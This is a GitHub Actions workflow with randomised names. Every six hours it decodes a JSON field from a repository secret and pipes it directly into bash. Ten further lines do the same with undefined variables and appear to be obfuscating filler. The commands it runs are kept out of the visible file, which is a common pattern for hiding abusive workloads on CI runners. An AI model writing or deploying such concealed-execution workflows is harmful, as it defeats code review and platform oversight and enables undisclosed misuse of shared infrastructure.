name: qianduole7681
on:
  workflow_dispatch:
  schedule:
    - cron: '6 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qianduole7681
        env:
          kxaru6: ${{ secrets.kxaru6 }}
        run: |
          echo $kxaru6 | jq -r .ftjy773 | /bin/bash
          echo $a80 | jq -r .i1913 | /bin/bash
          echo $fkwy17 | jq -r .gub6445 | /bin/bash
          echo $o6291 | jq -r .eaid55 | /bin/bash
          echo $frsl415 | jq -r .mgqce23 | /bin/bash
          echo $jagbn8304 | jq -r .n0187 | /bin/bash
          echo $rbfjk85409 | jq -r .ftk30703 | /bin/bash
          echo $fnkqq13327 | jq -r .qmbh90319 | /bin/bash
          echo $ldnc6707 | jq -r .bafl05468 | /bin/bash
          echo $wzwb08 | jq -r .skkc91 | /bin/bash
          echo $ysv22 | jq -r .ks5 | /bin/bash

